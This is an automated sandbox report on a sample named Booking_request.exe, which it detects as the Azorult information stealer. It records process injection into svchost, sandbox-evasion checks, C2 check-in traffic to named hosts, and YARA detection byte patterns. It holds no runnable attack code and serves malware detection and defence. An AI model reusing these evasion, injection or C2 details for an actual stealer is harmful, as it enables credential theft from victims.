Joe Sandbox Cloud Pro Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Booking_request.exe

Overview

General Information

Joe Sandbox Version:28.0.0
Analysis ID:53882
Start date:24.02.2020
Start time:11:04:08
Joe Sandbox Product:Cloud
Overall analysis duration:0h 7m 6s
Hypervisor based Inspection enabled:true
Report type:full
Sample file name:Booking_request.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10x64 HVM (IE 11.1, Chrome 67, Firefox 61, Adobe Reader 18, Java 8 Update 171)
Number of analysed new started processes analysed:17
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.spyw.evad.winEXE@3/0@1/1
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
  • Stop behavior analysis, all processes terminated
Warnings:
Show All
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, sc.exe, dllhost.exe, BackgroundTransferHost.exe, wermgr.exe, conhost.exe, backgroundTaskHost.exe, CompatTelRunner.exe
  • Excluded IPs from analysis (whitelisted): 52.142.119.134, 52.156.204.185, 52.229.171.202, 13.107.4.52, 13.68.93.109, 20.42.24.29, 40.91.91.94, 20.36.218.70, 2.18.68.82, 20.44.86.43, 40.90.22.190, 40.90.22.189, 40.90.22.191, 93.184.220.29, 104.18.24.243, 104.18.25.243, 40.112.91.29, 23.210.250.117, 92.122.213.194, 92.122.213.247, 52.164.221.179
  • Excluded domains from analysis (whitelisted): fe2.update.microsoft.com.nsatc.net, umwatson.trafficmanager.net, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, ris-prod-atm-perf.trafficmanager.net, ocsp.msocsp.com, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, login.live.com, sls.update.microsoft.com, www.msftconnecttest.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, ocsp.globalsign.cloud, fs.microsoft.com, sls.update.microsoft.com.akadns.net, settings-win.data.microsoft.com, e1723.g.akamaiedge.net, ipv4.login.msa.akadns6.net, v4ncsi.msedge.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, sls.emea.update.microsoft.com.akadns.net, 4-c-0003.c-msedge.net, fe2.update.microsoft.com, hostedocsp.globalsign.com, store-images.s-microsoft.com, ncsi.4-c-0003.c-msedge.net, login.msa.akadns6.net
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100Report FP / FNfalse
Azorult
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Remote ManagementWinlogon Helper DLLProcess Injection411Software Packing1Credential DumpingVirtualization/Sandbox Evasion1Application Deployment SoftwareData from Local SystemData CompressedStandard Non-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaService ExecutionPort MonitorsAccessibility FeaturesVirtualization/Sandbox Evasion1Network SniffingProcess Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Application Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesPath InterceptionProcess Injection411Input CaptureSecurity Software Discovery311Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic ProtocolExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or InformationCredentials in FilesSystem Information Discovery2Logon ScriptsInput CaptureData EncryptedMultiband CommunicationSIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasqueradingAccount ManipulationRemote System Discovery1Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Machine Learning detection for sampleShow sources
Source: Booking_request.exeJoe Sandbox ML: detected

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2029466 ET TROJAN Win32/AZORult V3.3 Client Checkin M13 192.168.2.3:49843 -> 45.147.197.20:80
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: sh1006535.had.suContent-Length: 105Cache-Control: no-cacheData Raw: 00 00 00 26 66 99 26 66 9b 42 70 9d 33 70 9d 34 70 9d 37 16 ec 26 67 ea 26 66 97 26 66 9a 26 66 9f 26 66 9a 26 66 97 26 66 9e 26 66 99 42 70 9c 47 70 9d 30 70 9d 36 70 9d 35 70 9d 30 70 9d 30 70 9d 3b 13 8b 30 6c 8b 31 11 eb 45 70 9d 31 16 e8 41 70 9d 36 70 9d 30 70 9c 47 70 9d 35 14 eb 40 70 9d 31 70 9d 33 10 ec Data Ascii: &f&fBp3p4p7&g&f&f&f&f&f&f&fBpGp0p6p5p0p0p;0l1Ep1Ap6p0pGp5@p1p3
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: sh1006535.had.su
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: sh1006535.had.suContent-Length: 105Cache-Control: no-cacheData Raw: 00 00 00 26 66 99 26 66 9b 42 70 9d 33 70 9d 34 70 9d 37 16 ec 26 67 ea 26 66 97 26 66 9a 26 66 9f 26 66 9a 26 66 97 26 66 9e 26 66 99 42 70 9c 47 70 9d 30 70 9d 36 70 9d 35 70 9d 30 70 9d 30 70 9d 3b 13 8b 30 6c 8b 31 11 eb 45 70 9d 31 16 e8 41 70 9d 36 70 9d 30 70 9c 47 70 9d 35 14 eb 40 70 9d 31 70 9d 33 10 ec Data Ascii: &f&fBp3p4p7&g&f&f&f&f&f&f&fBpGp0p6p5p0p0p;0l1Ep1Ap6p0pGp5@p1p3
Urls found in memory or binary dataShow sources
Source: svchost.exe, 00000006.00000003.586724359.0000000004DA0000.00000004.00000001.sdmpString found in binary or memory: http://195.245.112.115/index.php
Source: Booking_request.exe, 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://ip-api.com/json
Source: Booking_request.exe, 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmpString found in binary or memory: https://dotbit.me/a/

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
PE / OLE file has an invalid certificateShow sources
Source: Booking_request.exeStatic PE information: invalid certificate
Sample file is different than original file name gathered from version infoShow sources
Source: Booking_request.exe, 00000000.00000002.585333013.0000000000920000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs Booking_request.exe
Yara signature matchShow sources
Source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)Show sources
Source: Booking_request.exeStatic PE information: Section: .rr ZLIB complexity 0.999912239225
Classification labelShow sources
Source: classification engineClassification label: mal100.spyw.evad.winEXE@3/0@1/1
Creates mutexesShow sources
Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\A75A074CB-9414907A-356338F9-EF2CFB53-6AEC20EB
Source: C:\Users\user\Desktop\Booking_request.exeMutant created: \Sessions\1\BaseNamedObjects\b2Zm
PE file has an executable .text section and no other executable sectionShow sources
Source: Booking_request.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads software policiesShow sources
Source: C:\Users\user\Desktop\Booking_request.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\Booking_request.exeFile read: C:\Users\user\Desktop\Booking_request.exeJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\Booking_request.exe 'C:\Users\user\Desktop\Booking_request.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Source: C:\Users\user\Desktop\Booking_request.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exeJump to behavior
Submission file is bigger than most known malware samplesShow sources
Source: Booking_request.exeStatic file information: File size 1569992 > 1048576
PE file has a big raw sectionShow sources
Source: Booking_request.exeStatic PE information: Raw size of .rr is bigger than: 0x100000 < 0x110a00
PE file contains a mix of data directories often seen in goodwareShow sources
Source: Booking_request.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Booking_request.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Booking_request.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Booking_request.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Booking_request.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Booking_request.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: Booking_request.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
PE file contains a debug data directoryShow sources
Source: Booking_request.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
PE file contains a valid data directory to section mappingShow sources
Source: Booking_request.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Booking_request.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Booking_request.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Booking_request.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Booking_request.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
PE file contains an invalid checksumShow sources
Source: Booking_request.exeStatic PE information: real checksum: 0x18086a should be: 0x189dcc
PE file contains sections with non-standard namesShow sources
Source: Booking_request.exeStatic PE information: section name: .rr

Malware Analysis System Evasion:

barindex
Checks if the current machine is a sandbox (GetTickCount - Sleep)Show sources
Source: C:\Users\user\Desktop\Booking_request.exeFunction Chain: GetTickCount - Sleep - GetTickCount
Checks if the current machine is a sandbox (GlobalMemoryStatusEx - GetDesktopWindow - CreateToolhelp32Snapshot)Show sources
Source: C:\Users\user\Desktop\Booking_request.exeFunction Chain: GlobalMemoryStatusEx - GetDesktopWindow - CreateToolhelp32Snapshot
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmpBinary or memory string: KERNEL32FRIDA-WINJECTOR-HELPER-32.EXE
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmpBinary or memory string: USER32.DLLFRIDA-WINJECTOR-HELPER-64.EXE
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmpBinary or memory string: VBoxService.exe
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmpBinary or memory string: qemu-ga.exe
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmpBinary or memory string: VBoxTray.exe
Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmpBinary or memory string: VBoxTray.exeKernel32.dllKernel32GlobalMemoryStatusEx
Queries a list of all running processesShow sources
Source: C:\Users\user\Desktop\Booking_request.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks if the current process is being debuggedShow sources
Source: C:\Users\user\Desktop\Booking_request.exeProcess queried: DebugFlagsJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.147.197.20 80Jump to behavior
Allocates memory in foreign processesShow sources
Source: C:\Users\user\Desktop\Booking_request.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 400000 protect: page execute and read and writeJump to behavior
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\Desktop\Booking_request.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
Writes to foreign memory regionsShow sources
Source: C:\Users\user\Desktop\Booking_request.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
Source: C:\Users\user\Desktop\Booking_request.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 401000Jump to behavior
Source: C:\Users\user\Desktop\Booking_request.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 41B000Jump to behavior
Source: C:\Users\user\Desktop\Booking_request.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 41C000Jump to behavior
Source: C:\Users\user\Desktop\Booking_request.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 41D000Jump to behavior
Source: C:\Users\user\Desktop\Booking_request.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 41E000Jump to behavior
Source: C:\Users\user\Desktop\Booking_request.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2FDC008Jump to behavior
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Users\user\Desktop\Booking_request.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exeJump to behavior

Language, Device and Operating System Detection:

barindex
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AzorultShow sources
Source: Yara matchFile source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Booking_request.exe PID: 1816, type: MEMORY
Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4412, type: MEMORY
Yara detected Azorult Info StealerShow sources
Source: Yara matchFile source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: Booking_request.exe PID: 1816, type: MEMORY
Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4412, type: MEMORY

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

No simulations

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Booking_request.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmpAzorultdetect Azorult in memoryJPCERT/CC Incident Response Group
  • 0x182a8:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x18908:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x19ff0:$v2: http://ip-api.com/json
  • 0x18c62:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
    00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
      00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmpAzorultdetect Azorult in memoryJPCERT/CC Incident Response Group
      • 0x964cc:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      • 0x96b2c:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
      • 0x98214:$v2: http://ip-api.com/json
      • 0x96e86:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
      00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
        00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
          00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmpAzorultdetect Azorult in memoryJPCERT/CC Incident Response Group
          • 0x18618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
          • 0x18c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
          • 0x1a360:$v2: http://ip-api.com/json
          • 0x18fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
          00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmpJoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
            00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmpJoeSecurity_Azorult_1Yara detected AzorultJoe Security
              00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmpAzorult_1Azorult Payloadkevoreilly
              • 0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 ...
              • 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
              Process Memory Space: Booking_request.exe PID: 1816JoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
                Process Memory Space: Booking_request.exe PID: 1816JoeSecurity_Azorult_1Yara detected AzorultJoe Security
                  Process Memory Space: svchost.exe PID: 4412JoeSecurity_AzorultYara detected Azorult Info StealerJoe Security
                    Process Memory Space: svchost.exe PID: 4412JoeSecurity_Azorult_1Yara detected AzorultJoe Security

                      Unpacked PEs

                      No yara matches

                      Sigma Overview

                      No Sigma rule has matched

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.